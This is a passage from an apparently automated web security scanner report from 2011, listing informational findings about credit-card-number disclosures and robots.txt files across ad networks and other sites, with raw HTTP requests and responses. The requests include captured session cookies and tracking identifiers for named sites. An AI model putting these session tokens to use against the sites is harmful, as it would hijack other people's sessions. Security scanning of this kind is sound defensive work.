Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:46 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 5082

function googleAdSlot(id, contents) {this.id_ = id;this.contents_ = contents;this.loaded_ = false;}function addAdSenseContent(w, slot_id, content) {var params_map = w['google_slot_contents'] ||(w['goo
...[SNIP]...
0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D\x22\x3e\x3c/script\x3e\x3c/body\x3e\x3c/html\x3e';addAdSenseContent(window, 5951, adsense_content_5951);renderAdSense(window, document, 5951, 300, 250, true);
29.2. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The following credit card number was disclosed in the response:

Request

GET /ab?enc=4XoUrkfhFEDhehSuR-EUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAHSOBcgAAAAA.&tt_code=livejournal.com&udj=uf%28%27a%27%2C+9797%2C+1303741246%29%3Buf%28%27c%27%2C+47580%2C+1303741246%29%3Buf%28%27r%27%2C+173255%2C+1303741246%29%3Bppv%288991%2C+%278959360767911564416%27%2C+1303741246%2C+1303784446%2C+47580%2C+25553%29%3B&cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU.&referrer=http://www.livejournal.com/&pp=TbWDPgACKZsK5XeQflcean0rg75a9lJ4uX93wQ&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:20:47 GMT
Content-Length: 1454

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAA
...[SNIP]...
0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D\";\n//-->
...[SNIP]...
29.3. http://www.kronos.com/email/c/agendalcc11-full.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kronos.com
Path:   /email/c/agendalcc11-full.pdf

Issue detail

The following credit card number was disclosed in the response:

Request

GET /email/c/agendalcc11-full.pdf HTTP/1.1
Host: www.kronos.com
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/email/c/agendalcc11-full.pdf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.kronos.com&SiteLanguage=1033; EktGUID=09aa79d0-673f-4609-b21e-7d9f4c9303d4; EkAnalytics=newuser; KRONOS_PUBLIC_US=oLbiTnpP6Si6kOk_DB7jFLNPiaC_Ce4w_I3BqCTnnw8TKWxdHCNaWZCIwvL0jHFbx-CJ_B7N8OAFc2s2P32q9I3r8vBB6mRCf7d9OEqeKNcwx6_MGW_2YzYMKIayfawPjXY5248iYocxSIZ_gu-1z8fF49vaXn80g8D6fyxIiYbbHFSz0; ASP.NET_SessionId=zoqftdbukjhn1b55hrsfjqnv; s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; fcspersistslider1=5; s_nr=1303741346229; s_invisit=true; s_lv=1303741346233; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=kronos-dev%3D%2526pid%253Dkronos%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kronos.com%25252Fexperience2011%2526ot%253DA; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.10.10.1303738437
Range: bytes=32768-284279
If-Range: Thu, 14 Apr 2011 19:48:09 GMT

Response

HTTP/1.1 206 Partial Content
Cache-Control: max-age=432000
Content-Length: 251512
Content-Type: application/pdf
Content-Location: http://www.kronos.com/email/c/agendalcc11-full.pdf
Content-Range: bytes 32768-284279/284280
Last-Modified: Thu, 14 Apr 2011 19:48:09 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:22:26 GMT

6w.Sn|.c^...[...P.xn.m".>*.6(.Ef.H]...X....'.....]..,-/PSQ.XA....l....a.i.._V.....LZ7y...aK.......w... &.........-QGKF{s.Op...$.;p....)..q^.1.B2:...?8u.....|3e.:_..~...w...k...^.h..4.n*..8..\}S
.|.
...[SNIP]...
< /Type /FontDescriptor /Ascent 952 /CapHeight 644 /Descent -269 /Flags 4
/FontBBox [-476 -194 1214 952] /FontName /SDJQOU+Calibri /ItalicAngle 0 /StemV
0 /AvgWidth 503 /MaxWidth 1288 /XHeight 476 /FontFile2 32 0 R >
...[SNIP]...
< /Type /FontDescriptor /Ascent 952 /CapHeight 644 /Descent -269 /Flags 68
/FontBBox [-476 -194 1214 952] /FontName /EGZQJU+Calibri-Italic /ItalicAngle
-5 /StemV 0 /AvgWidth 502 /MaxWidth 1288 /XHeight 476 /FontFile2 38 0 R >
...[SNIP]...
30. Robots.txt file  previous  next
There are 85 instances of this issue:

30.1. http://945075.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://945075.r.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 945075.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Tue, 15 Sep 2009 18:04:58 GMT
Accept-Ranges: bytes
ETag: "455b9d92f36ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Mon, 25 Apr 2011 12:12:16 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /
30.2. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:37:55 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /

30.3. http://ad.doubleclick.net/adj/lj.homepage/loggedout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/lj.homepage/loggedout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 25 Apr 2011 14:31:42 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
30.4. http://ajax.googleapis.com/ajax/services/feed/load  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /ajax/services/feed/load

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT
Date: Mon, 25 Apr 2011 16:23:41 GMT
Expires: Mon, 25 Apr 2011 16:23:41 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
30.5. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/plain; charset=utf-8
Expires: Wed, 25 May 2011 15:17:38 GMT
X-FB-Server: 10.32.31.118
Connection: close
Content-Length: 24

User-agent: *
Disallow:
30.6. http://api.flickr.com/services/feeds/photos_public.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.flickr.com
Path:   /services/feeds/photos_public.gne

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.flickr.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:41:32 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Thu, 24-Apr-2014 19:41:32 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Sun, 25-Apr-2010 19:41:31 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Sun, 25-Apr-2010 19:41:31 GMT; path=/; domain=flickr.com
Vary: Accept-Encoding
X-Served-By: www102.flickr.mud.yahoo.com
Cache-Control: private
Content-Length: 143
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /gp/
Disallow: /report_abuse.gne
Disallow: /abuse
Disallow: /signin
Disallow: /search
Disallow: /groups/10millionphotos
30.7. http://apnxscm.ac3.msn.com:81/CACMSH.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apnxscm.ac3.msn.com:81
Path:   /CACMSH.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: apnxscm.ac3.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/plain
Expires: Tue, 26 Apr 2011 14:36:35 GMT
Last-Modified: Sat, 02 Apr 2011 00:47:24 GMT
Accept-Ranges: bytes
ETag: "1CBF0CF87F3F600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Mon, 25 Apr 2011 14:36:34 GMT
Connection: close
Content-Length: 70

# Keep all robots out of entire web site
User-agent: *
Disallow: /
30.8. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 26 Apr 2011 14:23:30 GMT
Date: Mon, 25 Apr 2011 14:23:30 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /
30.9. http://b2bcontext.ru/services/advertisement/getblock  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b2bcontext.ru
Path:   /services/advertisement/getblock

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b2bcontext.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:47:21 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Mon, 26 Jul 2010 15:06:23 GMT
ETag: "5960d7-2d-48c4bba4eb9c0"
Accept-Ranges: bytes
Content-Length: 45
Vary: Accept-Encoding

User-agent: *
Disallow:
Host: b2bcontext.ru
30.10. http://beacon.securestudies.com/scripts/beacon.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.securestudies.com
Path:   /scripts/beacon.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 26 Apr 2011 14:50:23 GMT
Date: Mon, 25 Apr 2011 14:50:23 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /
30.11. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.mail.ru
Path:   /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.mail.ru

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:29:06 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
Content-Type: text/plain; charset=UTF-8
Expires: Mon, 25 Apr 2011 15:29:06 GMT
Content-Length: 26
Connection: close

User-Agent: *
Disallow: /
30.12. http://bs.yandex.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.yandex.ru
Path:   /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.yandex.ru

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:30:37 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
Content-Type: text/plain; charset=UTF-8
Expires: Mon, 25 Apr 2011 15:30:37 GMT
Content-Length: 26
Connection: close

User-Agent: *
Disallow: /
30.13. http://cache.fimservecdn.com/contents/260/863/863260/lmb-15598-32799-48501.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.fimservecdn.com
Path:   /contents/260/863/863260/lmb-15598-32799-48501.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cache.fimservecdn.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.67
Content-Type: text/plain
ETag: W/"26-1205261468000"
Last-Modified: Tue, 11 Mar 2008 18:51:08 GMT
Content-Length: 26
Cache-Control: max-age=2592000
Date: Mon, 25 Apr 2011 16:07:44 GMT
Connection: close

User-agent: *
Disallow: /
30.14. https://checkout.netsuite.com/robots.txt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /robots.txt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:41 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 103
Last-Modified: Sat, 23 Apr 2011 00:28:30 GMT
NS_RTIMER_COMPOSITE: -1592275309:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/plain

# Allow all robots to spider everything by disallowing nothing

User-agent: *
Crawl-Delay: 20
Disallow:
30.15. http://clients1.google.com/complete/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clients1.google.com
Path:   /complete/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clients1.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:08:24 GMT
Expires: Mon, 25 Apr 2011 12:08:24 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
30.16. http://d1.openx.org/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /ajs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:07:21 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "47be8b-131-48f142a249100"
Accept-Ranges: bytes
Content-Length: 305
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...
30.17. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Varnish: 1696648009
Date: Mon, 25 Apr 2011 15:14:04 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /
30.18. http://demr.opt.fimserve.com/adopt/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://demr.opt.fimserve.com
Path:   /adopt/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: demr.opt.fimserve.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1205261468000"
Last-Modified: Tue, 11 Mar 2008 18:51:08 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 25 Apr 2011 16:07:44 GMT
Connection: keep-alive

User-agent: *
Disallow: /
30.19. http://desk.opt.fimserve.com/adopt/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://desk.opt.fimserve.com
Path:   /adopt/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: desk.opt.fimserve.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 16:12:56 GMT
Content-Type: text/plain
Connection: keep-alive
ETag: W/"26-1205261468000"
Last-Modified: Tue, 11 Mar 2008 18:51:08 GMT
Content-Length: 26

User-agent: *
Disallow: /
30.20. http://direct.yandex.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: direct.yandex.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:59 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Vary: Host
Set-Cookie: yandexuid=710800411303742159; path=/; expires=Thu, 22-Apr-21 14:35:59 GMT; domain=.yandex.ru
Last-Modified: Mon, 09 Aug 2010 08:46:53 GMT
ETag: "2a26c4-1c3-4c5fc07d"
Accept-Ranges: bytes
Content-Length: 451

User-Agent: *
Disallow: /registered/
Disallow: /popupdisabledIps.html?disabledIps=
Disallow: /servicing?thanks=1
Disallow: /?add-half
Disallow: /?top
Disallow: /?mail
Disallow: /?hnt=
Disallow: /catal
...[SNIP]...
30.21. http://duckduckgo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: duckduckgo.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 15:39:03 GMT
Content-Type: text/plain
Content-Length: 124
Last-Modified: Fri, 14 Jan 2011 16:33:18 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /lite
Disallow: /html

# No search result pages
Disallow: /*?

User-agent: ia_archiver
Disallow: /

30.22. http://fonts.googleapis.com/css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fonts.googleapis.com
Path:   /css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 25 Apr 2011 16:03:30 GMT
Expires: Mon, 25 Apr 2011 16:03:30 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /
30.23. http://forums.comodo.com/rss.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comodo.com
Path:   /rss.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: forums.comodo.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:28:48 GMT
Server: Apache
Last-Modified: Tue, 12 Jun 2007 16:07:18 GMT
ETag: "3a7-432b7b1121980"
Accept-Ranges: bytes
Content-Length: 935
Connection: close
Content-Type: text/plain

# robots.txt file for
# http://forums.comodo.com

Sitemap: http://forums.comodo.com/sitemap.xml

User-agent: *
Disallow: /index.php?action=search
Disallow: /index.php?action=calendar
Disallow: /ind
...[SNIP]...
30.24. http://forums.manageengine.com/fbw  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.manageengine.com
Path:   /fbw

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: forums.manageengine.com

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=fcab3ada-01e9-4127-bcca-5e8767e2ef21; Path=/
Set-Cookie: JSESSIONID=C454637E3F29ACCC6DE97FF79C18152E; Path=/
ETag: W/"263-1303448978000"
Last-Modified: Fri, 22 Apr 2011 05:09:38 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 263
Date: Mon, 25 Apr 2011 12:11:53 GMT
Server: Apache-Coyote/1.1
Connection: close

# ------------------------------------------
# Zoho -- http://discussions.zoho.com
# Robot Exclusion File -- robots.txt
# Author: Rajaram.I
# Last Updated: 05/10/09
# -------------------------------
...[SNIP]...
30.25. http://games.mochiads.com/c/g/moon-volley/mvolley.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.mochiads.com
Path:   /c/g/moon-volley/mvolley.swf

Issue detail

